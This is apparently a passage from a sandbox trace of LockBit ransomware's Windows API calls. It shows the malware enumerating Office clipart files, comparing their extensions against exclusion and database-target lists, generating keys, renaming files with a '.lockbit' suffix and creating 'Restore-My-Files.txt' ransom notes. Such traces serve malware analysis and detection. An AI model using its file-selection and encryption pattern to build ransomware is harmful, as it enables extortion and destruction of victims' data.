lpFileSize=0x3df0020*=18300) returned 1 [0162.059] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.060] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.060] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.060] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.060] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.060] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.066] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00530_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00530_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.066] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.066] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.068] free (_Block=0x1fa2ed8) [0162.068] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00530_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.068] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.068] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.068] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x530, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00532_.WMF", cAlternateFileName="")) returned 1 [0162.068] lstrcmpiW (lpString1=".", lpString2="NA00532_.WMF") returned -1 [0162.068] lstrcmpiW (lpString1="..", lpString2="NA00532_.WMF") returned -1 [0162.068] PathFindExtensionW (pszPath="NA00532_.WMF") returned=".WMF" [0162.068] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.068] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.068] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.068] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.069] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.069] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.070] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00532_.WMF") returned 1 [0162.070] lstrcmpiW (lpString1="ntldr", lpString2="NA00532_.WMF") returned 1 [0162.070] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00532_.WMF") returned 1 [0162.070] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00532_.WMF") returned -1 [0162.070] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00532_.WMF") returned -1 [0162.070] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00532_.WMF") returned 1 [0162.070] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00532_.WMF") returned -1 [0162.070] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.070] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00532_.WMF") returned=".WMF" [0162.071] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.071] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.071] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.072] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.072] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00532_.WMF.lockbit") returned 72 [0162.072] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00532_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00532_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0162.073] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.073] malloc (_Size=0x40068) returned 0x3df0008 [0162.073] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1328) returned 1 [0162.073] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.074] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.074] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.074] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.074] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0162.080] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00532_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00532_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.080] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.080] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0162.080] free (_Block=0x1fa2ed8) [0162.080] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00532_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.080] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.080] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.081] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34cb1d00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x594d2670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x34cb1d00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x7d14, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00538_.WMF", cAlternateFileName="")) returned 1 [0162.081] lstrcmpiW (lpString1=".", lpString2="NA00538_.WMF") returned -1 [0162.081] lstrcmpiW (lpString1="..", lpString2="NA00538_.WMF") returned -1 [0162.081] PathFindExtensionW (pszPath="NA00538_.WMF") returned=".WMF" [0162.081] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.081] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.082] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0162.082] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA00538_.WMF") returned 1 [0162.083] lstrcmpiW (lpString1="ntldr", lpString2="NA00538_.WMF") returned 1 [0162.083] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA00538_.WMF") returned 1 [0162.083] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA00538_.WMF") returned -1 [0162.083] lstrcmpiW (lpString1="autorun.inf", lpString2="NA00538_.WMF") returned -1 [0162.083] lstrcmpiW (lpString1="thumbs.db", lpString2="NA00538_.WMF") returned 1 [0162.083] lstrcmpiW (lpString1="iconcache.db", lpString2="NA00538_.WMF") returned -1 [0162.083] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0162.083] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00538_.WMF") returned=".WMF" [0162.083] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0162.083] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0162.083] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0162.084] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0162.084] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0162.084] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0162.084] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0162.084] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0162.084] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0162.084] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0162.084] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0162.084] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0162.084] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0162.084] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0162.084] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00538_.WMF.lockbit") returned 72 [0162.084] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00538_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00538_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0162.085] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0162.085] malloc (_Size=0x40068) returned 0x3df0008 [0162.085] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32020) returned 1 [0162.085] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.086] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0162.086] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.086] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.086] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0162.086] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0162.146] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00538_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00538_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0162.146] malloc (_Size=0xa6) returned 0x1fa2ed8 [0162.147] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0162.148] free (_Block=0x1fa2ed8) [0162.148] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00538_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0162.148] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0162.148] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0162.148] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23970600, ftCreationTime.dwHighDateTime=0x1bd4b0d, ftLastAccessTime.dwLowDateTime=0x6a34aa30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x23970600, ftLastWriteTime.dwHighDateTime=0x1bd4b0d, nFileSizeHigh=0x0, nFileSizeLow=0x64c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA00641_.WMF", cAlternateFileName="")) returned 1 [0162.148] lstrcmpiW (lpString1=".", lpString2="NA00641_.WMF") returned -1 [0162.149] lstrcmpiW (lpString1="..", lpString2="NA00641_.WMF") returned -1 [0162.149] PathFindExtensionW (pszPath="NA00641_.WMF") returned=".WMF" [0162.149] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0162.149] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0162.150] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0162.150] lstrcmpiW 